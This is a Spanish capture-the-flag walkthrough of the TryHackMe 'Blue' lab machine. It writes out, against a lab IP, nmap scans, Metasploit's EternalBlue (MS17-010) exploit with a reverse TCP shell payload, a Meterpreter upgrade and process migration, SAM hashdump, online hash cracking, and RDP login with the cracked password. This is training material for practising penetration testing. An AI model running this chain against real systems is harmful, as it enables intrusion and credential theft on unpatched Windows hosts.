Walkthrough BLUE (THM)



   Walkthrough BLUE (THM)



Primero de todo Ejecutamos la Maquina victima ya teniendo preparado nuestro Kali/Parrot.

Y nos apuntamos las direcciones IP Victimas y la nuestra.


Reconocimiento


Si seguimos la ruta de aprendizaje de Offensive Pentesting tendremos que realizar la explotación con Metasploit, por lo que abrimos msfconsole en la terminal y realizamos el escaneo de puertos principal con nmap:

        nmap -p- -sS -n -Pn --min-rate 5000 10.10.164.34

Y nos arroja este primer resultado:

Ahora profundizaremos en nuestro escaneo para obtener mas información a cerca de los Servicios que corren y ejecutaremos unos Scripts de reconocimiento básicos.

        nmap -p135,139,445,3389,49152,49153,49154,49158,49160 -sCV 10.10.164.34




Nos arroja bastante información, como un nombre de usuario (JON), una cuenta guest, tipo de sistema operativo, Windows 7 y que usa el Service Pack 1.

Si queremos podemos obtener un poco mas de información sobre el puerto 445 ejecutando:

        nmap -sV -vv -p445 --script vuln 10.10.164.34



Explotación

Aquí veremos que tenemos el puerto en cuestión vulnerable al CVE ms17-010 (Eternalblue)

aprovechando que ya estamos en Metasploit realizamos la búsqueda de dicha vulnerabilidad, y la seleccionamos:

        search ms17-010

        use exploit/windows/smb/ms17_010_eternalblue

Y con (show options) miraremos que campos debemos rellenar, pero antes seleccionamos el siguiente payload opcional:

        set payload windows/x64/shell/reverse_tcp



Y ejecutándolo con run, ya estamos dentro como authority\system!!!!



Migración de terminal a una sesión con Meterpreter

Esto no debe ser ningún problema si lo realizamos paso por paso, una vez hemos obtenido la sesión como expongo aquí:


  • Ctrl + Z (y con “Y” la enviamos al Background.

  • search shell_to_meterpreter (y seleccionamos la que nos sale, “use 0”)


  • Vemos las opciones, listamos con (sessions -l) que sesión teníamos abierta, y la establecemos con “set session 1”.

  • Una vez establecida y ejecutada con “run”, podemos volver a listar las sesiones y ver como se ha creado la sesión con meterpreter. La cual la ejecutaremos con sessions -i 2

  • Y con el comando help veremos todas las opciones que tenemos disponibles.


  • Ahora listamos los procesos con ps y migramos el proceso a uno que lo esté ejecutando NT AUTHORITY\SYSTEM y migramos nuestra



Cracking

Ahora lo que aremos será ver los hashes del equipo que se encuentra en la base de datos SAM de Windows, ejecutando el comando “hashdump”.


Como THM solo nos pide la contraseña de JON, solo seleccionamos esta, pero podríamos hacerlo con las demás.

Lo más fácil es abrir en Google https://crackstation.net/ , pegar el hash y en cuestión de segundos lo tendremos desencriptado.




Find flags!

Lo mas sencillo es hacer una búsqueda con “search” y a continuación navegar a los directorios “cd” y ver el contenido con “cat”.




Y ya habremos finalizado la maquina Blue.

Si queremos podemos abrir un escritorio remoto con el comando:

        rdesktop 10.10.164.34 -u 'jon' -p 'alqfna22'

Y otro día trabajaremos la explotación manual de Eternalblue y como crear persistencias.







Comentarios